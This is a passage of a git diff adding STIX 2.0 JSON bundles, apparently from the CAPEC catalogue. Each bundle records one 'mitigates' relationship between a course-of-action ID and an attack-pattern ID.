"2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--db632a96-33ad-46ce-b5f3-efba6a2e6495", + "target_ref": "attack-pattern--71dbbb97-42e8-4d9b-aadf-35f06a2beb57", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--806949e1-cbc3-4289-a9fb-4640545aefa5.json b/capec/relationship/relationship--806949e1-cbc3-4289-a9fb-4640545aefa5.json new file mode 100644 index 0000000000..c38f6aa8de --- /dev/null +++ b/capec/relationship/relationship--806949e1-cbc3-4289-a9fb-4640545aefa5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d59c1ab3-6a51-49f9-8c79-8cad51951be3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--806949e1-cbc3-4289-a9fb-4640545aefa5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ed4496e4-fa86-47b5-af84-31e985472de1", + "target_ref": "attack-pattern--9a8fa9cc-3a90-4ca1-b298-7195fe8e16b2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--811e822f-16cf-4141-af34-ece4c8f64959.json b/capec/relationship/relationship--811e822f-16cf-4141-af34-ece4c8f64959.json new file mode 100644 index 0000000000..575a9de0cc --- /dev/null +++ b/capec/relationship/relationship--811e822f-16cf-4141-af34-ece4c8f64959.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b6960648-7bd0-4cab-9efa-b5cc651e9afd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--811e822f-16cf-4141-af34-ece4c8f64959", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--67124c75-a596-4e39-84b5-d2de7b878fc0", + "target_ref": "attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--81305fb7-b358-42db-818e-1ffe0161cd24.json b/capec/relationship/relationship--81305fb7-b358-42db-818e-1ffe0161cd24.json new file mode 100644 index 0000000000..53fbf851f2 --- /dev/null +++ b/capec/relationship/relationship--81305fb7-b358-42db-818e-1ffe0161cd24.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--55479923-7d5b-4763-b519-ea0b4c38bf6e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--81305fb7-b358-42db-818e-1ffe0161cd24", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9b398789-71b2-4867-987f-2cfaabfdac3a", + "target_ref": "attack-pattern--d01b1014-6dd4-42b3-92c4-ec82745071e8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--815e4cb8-f89c-47bf-b28a-1af4e3f43a48.json b/capec/relationship/relationship--815e4cb8-f89c-47bf-b28a-1af4e3f43a48.json new file mode 100644 index 0000000000..452240830e --- /dev/null +++ b/capec/relationship/relationship--815e4cb8-f89c-47bf-b28a-1af4e3f43a48.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f5996276-955a-4221-a42d-9d5bd8eb844f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--815e4cb8-f89c-47bf-b28a-1af4e3f43a48", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb0f214e-a1d7-448a-ab0c-e775bcd36879", + "target_ref": "attack-pattern--6326cb50-e1ee-4029-aab8-0af7efd3a268", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--818c7ba6-63c6-459c-9d04-52f2215fcfb6.json b/capec/relationship/relationship--818c7ba6-63c6-459c-9d04-52f2215fcfb6.json new file mode 100644 index 0000000000..11b67a9e72 --- /dev/null +++ b/capec/relationship/relationship--818c7ba6-63c6-459c-9d04-52f2215fcfb6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7c2c3a67-f5b3-4a8f-bc0a-5b46f789839b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--818c7ba6-63c6-459c-9d04-52f2215fcfb6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6dc1b356-ef19-4ed1-8a64-65470da45dca", + "target_ref": "attack-pattern--9eb0b1bd-88c1-4fdd-ac6b-126f037807ce", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--81c7a7f1-9308-4649-aa22-24e65e541d6c.json b/capec/relationship/relationship--81c7a7f1-9308-4649-aa22-24e65e541d6c.json new file mode 100644 index 0000000000..2de7da004b --- /dev/null +++ b/capec/relationship/relationship--81c7a7f1-9308-4649-aa22-24e65e541d6c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b1199a4b-5947-49de-85e2-a9fcca639377", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--81c7a7f1-9308-4649-aa22-24e65e541d6c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf", + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--81d26642-80cd-46b4-b990-5e1fcc9ccc5e.json b/capec/relationship/relationship--81d26642-80cd-46b4-b990-5e1fcc9ccc5e.json new file mode 100644 index 0000000000..ebd0da7829 --- /dev/null +++ b/capec/relationship/relationship--81d26642-80cd-46b4-b990-5e1fcc9ccc5e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--23b3e624-c61b-4820-8441-1939af84c84b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--81d26642-80cd-46b4-b990-5e1fcc9ccc5e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--776f161f-fbfa-4de1-9f46-a34bffc47545", + "target_ref": "attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--81eac75b-00a6-48c3-87f6-c8f490b8074c.json b/capec/relationship/relationship--81eac75b-00a6-48c3-87f6-c8f490b8074c.json new file mode 100644 index 0000000000..1a2edcf7d0 --- /dev/null +++ b/capec/relationship/relationship--81eac75b-00a6-48c3-87f6-c8f490b8074c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--06c3c0d2-2680-4671-ba2c-5aabe7cbf9f5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--81eac75b-00a6-48c3-87f6-c8f490b8074c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7baed235-1f33-4e25-bdf6-eabc38355a9b", + "target_ref": "attack-pattern--d8b7836a-85a5-43ea-bc79-c6303137f74d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--81ef7c1f-e9cc-4c67-8622-6dccca0fbd6d.json b/capec/relationship/relationship--81ef7c1f-e9cc-4c67-8622-6dccca0fbd6d.json new file mode 100644 index 0000000000..40f6f9e4cb --- /dev/null +++ b/capec/relationship/relationship--81ef7c1f-e9cc-4c67-8622-6dccca0fbd6d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--07ca811b-8501-407f-a6fb-7a1e84ccbadd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--81ef7c1f-e9cc-4c67-8622-6dccca0fbd6d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3", + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8220a682-70a9-4d9d-9099-97188386d650.json b/capec/relationship/relationship--8220a682-70a9-4d9d-9099-97188386d650.json new file mode 100644 index 0000000000..d38d1401e4 --- /dev/null +++ b/capec/relationship/relationship--8220a682-70a9-4d9d-9099-97188386d650.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e963fbbe-a811-4e01-8d25-be1dbff114b7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8220a682-70a9-4d9d-9099-97188386d650", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4fd99982-ce00-4751-8e64-67f7257c25c4", + "target_ref": "attack-pattern--5ad16d8c-e126-4a03-8931-e1f29523e1ee", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--829cd726-e81c-46bb-929a-968d072b6337.json b/capec/relationship/relationship--829cd726-e81c-46bb-929a-968d072b6337.json new file mode 100644 index 0000000000..6c424cf10e --- /dev/null +++ b/capec/relationship/relationship--829cd726-e81c-46bb-929a-968d072b6337.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--14a5f926-1f11-4ecd-a2d6-daca0da03efc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--829cd726-e81c-46bb-929a-968d072b6337", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--54f22236-6457-4a31-a58b-f99f393d8892", + "target_ref": "attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--82d42851-afd1-4779-8f44-f9216f67318f.json b/capec/relationship/relationship--82d42851-afd1-4779-8f44-f9216f67318f.json new file mode 100644 index 0000000000..e07533fc1d --- /dev/null +++ b/capec/relationship/relationship--82d42851-afd1-4779-8f44-f9216f67318f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0ba20a88-c9fc-4a76-b41b-cffb5ec2004e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--82d42851-afd1-4779-8f44-f9216f67318f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-06T00:00:00.000Z", + "modified": "2017-01-06T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7", + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--83538c7f-410a-4fb8-8b6a-3de168066b99.json b/capec/relationship/relationship--83538c7f-410a-4fb8-8b6a-3de168066b99.json new file mode 100644 index 0000000000..4213e221e1 --- /dev/null +++ b/capec/relationship/relationship--83538c7f-410a-4fb8-8b6a-3de168066b99.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f0c53f57-1df9-4e8f-9fd2-88679cf8d051", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--83538c7f-410a-4fb8-8b6a-3de168066b99", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--61b2e7d2-67dd-4305-9afd-b015b4174c88", + "target_ref": "attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--837581cd-38d6-4ae8-881a-6e24f3d91501.json b/capec/relationship/relationship--837581cd-38d6-4ae8-881a-6e24f3d91501.json new file mode 100644 index 0000000000..9eebfbf32a --- /dev/null +++ b/capec/relationship/relationship--837581cd-38d6-4ae8-881a-6e24f3d91501.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--997af07a-0464-449c-93ec-64384094cb05", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--837581cd-38d6-4ae8-881a-6e24f3d91501", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2", + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8395c8af-2dba-4608-b79e-25a94a8e8d12.json b/capec/relationship/relationship--8395c8af-2dba-4608-b79e-25a94a8e8d12.json new file mode 100644 index 0000000000..72912e29f4 --- /dev/null +++ b/capec/relationship/relationship--8395c8af-2dba-4608-b79e-25a94a8e8d12.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--add7203d-5fa4-4b42-aaaa-ce7e558c8e1b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8395c8af-2dba-4608-b79e-25a94a8e8d12", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--561921de-6d1a-4bdf-aa42-2fde54309463", + "target_ref": "attack-pattern--10c3386d-d8da-45ea-9963-67befef551d5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--83bb94b7-c7bf-407b-ad77-5411a93c2090.json b/capec/relationship/relationship--83bb94b7-c7bf-407b-ad77-5411a93c2090.json new file mode 100644 index 0000000000..a00c75bdc3 --- /dev/null +++ b/capec/relationship/relationship--83bb94b7-c7bf-407b-ad77-5411a93c2090.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--418eba3d-5a03-41dc-b120-c3512b6cdeb8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--83bb94b7-c7bf-407b-ad77-5411a93c2090", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a9cece7b-a84a-4af1-8e06-3f188167a17c", + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--83ee75c4-f664-4d85-a75d-c147df341d98.json b/capec/relationship/relationship--83ee75c4-f664-4d85-a75d-c147df341d98.json new file mode 100644 index 0000000000..8a3123573f --- /dev/null +++ b/capec/relationship/relationship--83ee75c4-f664-4d85-a75d-c147df341d98.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e7a86b7b-4911-4311-ae1f-85332f5ff3dc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--83ee75c4-f664-4d85-a75d-c147df341d98", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--484680dd-30ae-434b-9cd3-1f30cf495f3b", + "target_ref": "attack-pattern--7b66655f-87f3-4eaa-8f61-ee8e2f23f6b9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--845db3a7-86b4-4ea8-a02e-59dcfef32685.json b/capec/relationship/relationship--845db3a7-86b4-4ea8-a02e-59dcfef32685.json new file mode 100644 index 0000000000..b8b85922e0 --- /dev/null +++ b/capec/relationship/relationship--845db3a7-86b4-4ea8-a02e-59dcfef32685.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f15abec0-b201-43da-9870-1eefbe74bb9c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--845db3a7-86b4-4ea8-a02e-59dcfef32685", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4d66c05f-25c0-4ae2-96db-b955fdde0af0", + "target_ref": "attack-pattern--a6ec69a5-b1df-412a-bae3-24edc5ff713c", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--84db461f-9151-492a-916c-180f978934e9.json b/capec/relationship/relationship--84db461f-9151-492a-916c-180f978934e9.json new file mode 100644 index 0000000000..0dc1d2d52c --- /dev/null +++ b/capec/relationship/relationship--84db461f-9151-492a-916c-180f978934e9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--11c77319-581f-45c5-bf83-724bb744abd8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--84db461f-9151-492a-916c-180f978934e9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4587f9b-8252-4e3f-b876-e7ef1681e45c", + "target_ref": "attack-pattern--5dae155c-ad21-4b0c-9d2c-bcd604c0ad6b", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--851e123e-3787-49ae-a913-2f5b740e4449.json b/capec/relationship/relationship--851e123e-3787-49ae-a913-2f5b740e4449.json new file mode 100644 index 0000000000..4ce9f3e30e --- /dev/null +++ b/capec/relationship/relationship--851e123e-3787-49ae-a913-2f5b740e4449.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--84aa8eb0-8f5d-4060-9705-118c6e1f96a6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--851e123e-3787-49ae-a913-2f5b740e4449", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--16197adf-0d21-44d9-8143-1b2e90f288f1", + "target_ref": "attack-pattern--ee680af9-b2da-44fc-a254-2c2925ffe18e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--865901c4-f6d2-4b7d-8779-72825f4b6805.json b/capec/relationship/relationship--865901c4-f6d2-4b7d-8779-72825f4b6805.json new file mode 100644 index 0000000000..1b5d9301eb --- /dev/null +++ b/capec/relationship/relationship--865901c4-f6d2-4b7d-8779-72825f4b6805.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5d35f762-8d93-4917-98a9-4450b27e834a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--865901c4-f6d2-4b7d-8779-72825f4b6805", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--29d228d4-14b2-4cb3-a702-37b58b13d7bd", + "target_ref": "attack-pattern--7fd466e3-0437-45f6-8cdc-0d9de4a4df92", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--86d2423d-06ba-4b1d-91ad-b4c3001e5963.json b/capec/relationship/relationship--86d2423d-06ba-4b1d-91ad-b4c3001e5963.json new file mode 100644 index 0000000000..da4ec27ea9 --- /dev/null +++ b/capec/relationship/relationship--86d2423d-06ba-4b1d-91ad-b4c3001e5963.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c0337a72-c450-45ed-938b-046476055c5e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--86d2423d-06ba-4b1d-91ad-b4c3001e5963", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3f84c0d9-28d1-4682-b953-e1bacd7d8dbf", + "target_ref": "attack-pattern--54d223de-6dd1-4f76-af5c-6d59b78b915a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--86d3766f-0a05-43b2-b51d-b7f6759dd217.json b/capec/relationship/relationship--86d3766f-0a05-43b2-b51d-b7f6759dd217.json new file mode 100644 index 0000000000..e0189b2105 --- /dev/null +++ b/capec/relationship/relationship--86d3766f-0a05-43b2-b51d-b7f6759dd217.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--eae655cf-e827-42e7-9a3a-bcdb50b2674a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--86d3766f-0a05-43b2-b51d-b7f6759dd217", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8727fb4f-f025-4007-8f5b-ef9421884453.json b/capec/relationship/relationship--8727fb4f-f025-4007-8f5b-ef9421884453.json new file mode 100644 index 0000000000..234ae267b2 --- /dev/null +++ b/capec/relationship/relationship--8727fb4f-f025-4007-8f5b-ef9421884453.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e50f8268-48ac-4154-bfcc-01a8069eaf24", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8727fb4f-f025-4007-8f5b-ef9421884453", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--70808a24-58bf-45de-aaaf-1fc1cc949937", + "target_ref": "attack-pattern--9e2a4e9f-633b-433e-a854-2705c5df916f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--87288ea2-a91a-4195-acc3-ac477bd9fb9e.json b/capec/relationship/relationship--87288ea2-a91a-4195-acc3-ac477bd9fb9e.json new file mode 100644 index 0000000000..fe335aaf66 --- /dev/null +++ b/capec/relationship/relationship--87288ea2-a91a-4195-acc3-ac477bd9fb9e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--df69dc82-a2b5-4c6e-8efe-9bab7471caf2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--87288ea2-a91a-4195-acc3-ac477bd9fb9e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--29a68aab-1993-4ce8-8742-cd88c7104498", + "target_ref": "attack-pattern--34f01011-987b-4447-8663-e32f695409cc", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8789e6c2-c33c-4049-8fea-9582e0f10cb6.json b/capec/relationship/relationship--8789e6c2-c33c-4049-8fea-9582e0f10cb6.json new file mode 100644 index 0000000000..551ec1f906 --- /dev/null +++ b/capec/relationship/relationship--8789e6c2-c33c-4049-8fea-9582e0f10cb6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0f3f805a-b463-412b-bc6b-1ed3beb95705", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8789e6c2-c33c-4049-8fea-9582e0f10cb6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1", + "target_ref": "attack-pattern--32ddfdf7-42d4-48d8-85ba-0e5de91cb711", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--87adce17-6faa-4dd1-b494-2aad494d524d.json b/capec/relationship/relationship--87adce17-6faa-4dd1-b494-2aad494d524d.json new file mode 100644 index 0000000000..68fd267333 --- /dev/null +++ b/capec/relationship/relationship--87adce17-6faa-4dd1-b494-2aad494d524d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0a1ab7e6-4bb9-4947-8cd2-78e762c23cc2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--87adce17-6faa-4dd1-b494-2aad494d524d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--59f6f5cc-aab7-46d0-bf72-761b5ef7c45d", + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--8888fb2f-589c-4fad-b1c4-a650025959fe.json b/capec/relationship/relationship--8888fb2f-589c-4fad-b1c4-a650025959fe.json new file mode 100644 index 0000000000..e6990b2ec5 --- /dev/null +++ b/capec/relationship/relationship--8888fb2f-589c-4fad-b1c4-a650025959fe.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8cfad7ee-07ec-4b95-9d65-906342401b07", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--8888fb2f-589c-4fad-b1c4-a650025959fe", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": 